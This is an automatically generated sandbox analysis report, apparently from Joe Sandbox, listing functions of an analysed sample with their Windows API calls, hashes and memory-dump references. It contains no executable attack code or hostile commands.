Instruction ID: 18ad254feef66a3778793fca10e54efd7caa74d84bcaff0e2f811d831fec6c66
Opcode Fuzzy Hash: 40f0e063838af908aa0c23a01ee66fead67f3bdac29e3056e6e3dd52480c6ad0
Instruction Fuzzy Hash: EDB15A72E042499FDB158F68C881BEEBBB5EF55310F18416BE945AB381D234DE05CBB2

Function 00DC7922 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00DC792E
IsDebuggerPresent.KERNEL32 ref: 00DC79FA
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00DC7A13
UnhandledExceptionFilter.KERNEL32(?), ref: 00DC7A1D

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 1bf440c3fd97e4b3415a0ed6da7a67fa5a789f8d6400fed42944e436a86e079d
Instruction ID: bf927323f474e81cea268c467b934f19f1b224b2e62e4ae2f9fa15fabdbd74ec
Opcode Fuzzy Hash: 1bf440c3fd97e4b3415a0ed6da7a67fa5a789f8d6400fed42944e436a86e079d
Instruction Fuzzy Hash: B931FB75D053199BDB21EF64D989BCDBBB8AF08300F1041DAE40CAB250EB709B858F55

Function 00DDC498 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00DD4EB1: GetLastError.KERNEL32(?,00000008,00DD9482), ref: 00DD4EB5
Part of subcall function 00DD4EB1: SetLastError.KERNEL32(00000000,00DEC480,00000024,00DD0419), ref: 00DD4F57

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00DDC4EC
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00DDC536
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00DDC5FC

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: f1f480bcd9961dac8efce19fd8a3a6ad50a5eec3d54c3f370378c296914e5f76
Instruction ID: d4d8560d70c9a87f61809bc8b6c5e4757c0a0cda12d5387c98575590a062e1a2
Opcode Fuzzy Hash: f1f480bcd9961dac8efce19fd8a3a6ad50a5eec3d54c3f370378c296914e5f76
Instruction Fuzzy Hash: C26190725202079BDB289F24DD82BBAB7A8EF04310F14617BE905C6399EB74E941CB70

Function 00DCDA73 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00DCDB6B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00DCDB75
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00DCDB82

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: adc392502a83249844ed643e3ba09d377085f55feb74bab0b64579c9a8edf7e3
Instruction ID: f086a12cc7d6b8c44eee8d8ad7513e90436ed5e3a7d4150a43b6480e3177fe02
Opcode Fuzzy Hash: adc392502a83249844ed643e3ba09d377085f55feb74bab0b64579c9a8edf7e3
Instruction Fuzzy Hash: 0331C474901329ABCB21DF64DD89B9CBBB9BF08310F5041EAE41CA7250EB749F858F64

Function 00DCFEF0 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b78e9bc5a25061f1abca4818c36b3245c47596756df3441acd3b4668cd2eb70a
Instruction ID: 9d3cc253c2608683694bcad5be4c9077ec6f38f6450a1c3d17c0b6d58bf8fa06
Opcode Fuzzy Hash: b78e9bc5a25061f1abca4818c36b3245c47596756df3441acd3b4668cd2eb70a
Instruction Fuzzy Hash: 38F13E71E012199FDF14CFA9C884BADBBB5FF88314F19826AE915A7341D7309D058BA4

Function 00E0945D Relevance: 2.9, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

/, xrefs: 00E09510
UT, xrefs: 00E09788

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: e0872cb26255705f7d48561bd0d36eae2ccbb937a8561f5ea2d9795a88105742
Instruction ID: 11841f2df6b336a27c637ee09825719b6f6c7adc55b01236b6b7a545c7518c15
Opcode Fuzzy Hash: e0872cb26255705f7d48561bd0d36eae2ccbb937a8561f5ea2d9795a88105742
Instruction Fuzzy Hash: 4D028EB1A002688FDF25CF64C8807AEBBB5AF45304F1454EAD949BB287D6349EC4CF95

Function 00E064F5 Relevance: 2.7, Strings: 2, Instructions: 178COMMON

Download Yara Rule

Strings

x`C, xrefs: 00E06584
``C, xrefs: 00E0656B

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID:
String ID: ``C$x`C
API String ID: 0-4276601940
Opcode ID: 4639c864b91f6e9cc3f469510a2f9944f86d2f54ec5b532889058d1e4e41c286
Instruction ID: 3b4b5bae445cce6fb8a5dbdb510ef3840b8b7ec496e20e0b6abfb5328e60feaf
Opcode Fuzzy Hash: 4639c864b91f6e9cc3f469510a2f9944f86d2f54ec5b532889058d1e4e41c286
Instruction Fuzzy Hash: 3851C4739001169BEB18CF58D4817E977B1EF94308F2694BEC84AEF2C6EB705955CB50

Function 00DD572C Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00DD5727,?,?,00000008,?,?,00DE15F5,00000000), ref: 00DD5959

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 7f1e16ff82983787c962f4ad835f5cd93ee7d0d9ed27da7de9fc5ab02491ab29
Instruction ID: c588409bf1c0847bf93eaeed3c00c1a34c93bc17a3dc7c47a3f13c557a55c333
Opcode Fuzzy Hash: 7f1e16ff82983787c962f4ad835f5cd93ee7d0d9ed27da7de9fc5ab02491ab29
Instruction Fuzzy Hash: 99B14A31610A08DFD718CF28D496A647BA0FF45364F29865AE8DACF3A5C335E992CF50

Function 00DC729C Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00DC72B2

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 8696e6fc17d60b408142676b74e764760db32f9f79aac665ef0c3cfb98908573
Instruction ID: 02fd738ea474d24f7afa7d0eb56c1bbccd4f8e3178801eb24a182bcfed8d22dd
Opcode Fuzzy Hash: 8696e6fc17d60b408142676b74e764760db32f9f79aac665ef0c3cfb98908573
Instruction Fuzzy Hash: DFA17DB19157458FDB18CF64D8C2BA9BBB1FB88324F28816ED419EB3A0D7349941CF60

Function 00DD9ABF Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4e07ada68a32889de3ba2ff3388249f2c3c002fa7142026603b0bc8aefe2c5
Instruction ID: 2c7f19f79c1961acbba3d9733b579063cac773719fdfe0b7fafdb53845f50d6c
Opcode Fuzzy Hash: 6d4e07ada68a32889de3ba2ff3388249f2c3c002fa7142026603b0bc8aefe2c5
Instruction Fuzzy Hash: 8531C876900219AFCB20EFA8DCD5EBBB76DEB84314F19415AF90597344EA31AE408B70

Function 00DCCAF2 Relevance: 1.6, Strings: 1, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00DCCC80

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 1f8a7aecf4b8b8a0699fb58a0be1a988316c41bb45692e393a6bbc5531041aad
Instruction ID: ef42fcd1cc161fc1274c05c1733d3ee91f1e1b2fe6ff204ef2a311b989e5c852
Opcode Fuzzy Hash: 1f8a7aecf4b8b8a0699fb58a0be1a988316c41bb45692e393a6bbc5531041aad
Instruction Fuzzy Hash: D0C1B0705206478FCB24CFA8C581F7ABBB6AB05310F18665DE69E97291C730ED45CB71

Function 00DDC6EB Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00DD4EB1: GetLastError.KERNEL32(?,00000008,00DD9482), ref: 00DD4EB5
Part of subcall function 00DD4EB1: SetLastError.KERNEL32(00000000,00DEC480,00000024,00DD0419), ref: 00DD4F57

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00DDC73F

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: ce5039e30cef9568cd2ebdd4908624926eeddf000a2a4475f10fe475e210f072
Instruction ID: 9953e6fec0786cd3a0cace18d42623831aff30695ec438c123d6d43d16e6fdbb
Opcode Fuzzy Hash: ce5039e30cef9568cd2ebdd4908624926eeddf000a2a4475f10fe475e210f072
Instruction Fuzzy Hash: ED217F32625207BBEB28AE25DC82A7A77A8EF44310F14106BF905D6341EB34ED41CB70

Function 00DDC372 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DD4EB1: GetLastError.KERNEL32(?,00000008,00DD9482), ref: 00DD4EB5
Part of subcall function 00DD4EB1: SetLastError.KERNEL32(00000000,00DEC480,00000024,00DD0419), ref: 00DD4F57

EnumSystemLocalesW.KERNEL32(00DDC498,00000001,00000000,?,-00000050,?,00DDCAC9,00000000,?,?,?,00000055,?), ref: 00DDC3E4

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: b2d136e6b06027bc987ceac1803beede4524184833aa61f2396b3cce8c57fb02
Instruction ID: 898aeff5e073234c742ff4c2f0fc25b9142193e3f7aad2688b3ea6314f94e468
Opcode Fuzzy Hash: b2d136e6b06027bc987ceac1803beede4524184833aa61f2396b3cce8c57fb02
Instruction Fuzzy Hash: C21148372103025FDB18AF38C8A15BABBA1FF80368F18842EE94787B40D771B942C760

Function 00DDC91A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00DD4EB1: GetLastError.KERNEL32(?,00000008,00DD9482), ref: 00DD4EB5
Part of subcall function 00DD4EB1: SetLastError.KERNEL32(00000000,00DEC480,00000024,00DD0419), ref: 00DD4F57

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00DDC6B4,00000000,00000000,?), ref: 00DDC946

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: baf9a1cf19f44af01a6ff098fe447e43f65adb86b39c80d169d1034d8ac19622
Instruction ID: 055e195cbcc3acf24df5f4f3da67eb5fe7dbb6c7f45165d0c6114fc72852423a
Opcode Fuzzy Hash: baf9a1cf19f44af01a6ff098fe447e43f65adb86b39c80d169d1034d8ac19622
Instruction Fuzzy Hash: 83F0A933610113BBDB245A658855BBA7758EF40755F19442AED46A3380DA74FE41CAB0

Function 00DDC40D Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DD4EB1: GetLastError.KERNEL32(?,00000008,00DD9482), ref: 00DD4EB5
Part of subcall function 00DD4EB1: SetLastError.KERNEL32(00000000,00DEC480,00000024,00DD0419), ref: 00DD4F57

EnumSystemLocalesW.KERNEL32(00DDC6EB,00000001,?,?,-00000050,?,00DDCA8D,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00DDC457

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 85ce6e746c166a19fd49cb9d3ceddad0185bf404c5bbc5d201ea0fac3607cd48
Instruction ID: 9b5813ea66c6877530ebffd187c36dd9b54bb871e52028821372a3af49656f4d
Opcode Fuzzy Hash: 85ce6e746c166a19fd49cb9d3ceddad0185bf404c5bbc5d201ea0fac3607cd48
Instruction Fuzzy Hash: 61F0C2362103056FDB146F79DC91A7ABB95EB80768F19842EF9468B790C6B1AC42CB60

Function 00DD5D7F Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DCDDC1: EnterCriticalSection.KERNEL32(?,?,00DD4B89,?,00DEC2E0,00000008,00DD4D4D,?,00DCC446,?), ref: 00DCDDD0

EnumSystemLocalesW.KERNEL32(00DD5D72,00000001,00DEC3A0,0000000C,00DD6127,00000000), ref: 00DD5DB7

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: f742ad2f9ebdf250ed9b011bd3837880e361ed2a272f8e7904c0064acdac389b
Instruction ID: 642a4aa343639e1fe139c06adf5a1a50e3d3b939a143b72d3d92bea86c7c4df8
Opcode Fuzzy Hash: f742ad2f9ebdf250ed9b011bd3837880e361ed2a272f8e7904c0064acdac389b
Instruction Fuzzy Hash: B0F03776A00311EFD700EF98E846B997BB1EB44721F10812AE421EB3A0CBB55A058B60

Function 00DDC327 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DD4EB1: GetLastError.KERNEL32(?,00000008,00DD9482), ref: 00DD4EB5
Part of subcall function 00DD4EB1: SetLastError.KERNEL32(00000000,00DEC480,00000024,00DD0419), ref: 00DD4F57

EnumSystemLocalesW.KERNEL32(00DDC280,00000001,?,?,?,00DDCAEB,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00DDC35E

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: affb05357dc1292a446f98c56dec56f9924c2e86848fed14d1732b8b958650fe
Instruction ID: d2166c9b413bc639b86f092e4555821296dfa2bf35960621f9f71e48d81c4405
Opcode Fuzzy Hash: affb05357dc1292a446f98c56dec56f9924c2e86848fed14d1732b8b958650fe
Instruction Fuzzy Hash: 18F0E53630020667CB14AF79D84567ABF94EFC1B60F0A405AEA09CB790C6729946C7B0

Function 00DD622B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00DD23AE,?,20001004,00000000,00000002,?,?,00DD19B0), ref: 00DD625F

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 2e69608b8f02aef7048a2a5fb2cd2e4cd4873899b3eaf55ea40d9ae32c6c9700
Instruction ID: 1b03433d598783e2e5cebd677d85cc1cacdc8201bbb69d4805e9c118d3049de2
Opcode Fuzzy Hash: 2e69608b8f02aef7048a2a5fb2cd2e4cd4873899b3eaf55ea40d9ae32c6c9700
Instruction Fuzzy Hash: 49E01A32500268BBCF122F60EC08AAE7F2AEF44760F048016F94566321DB71CA20AAF5

Function 00DC7AAF Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

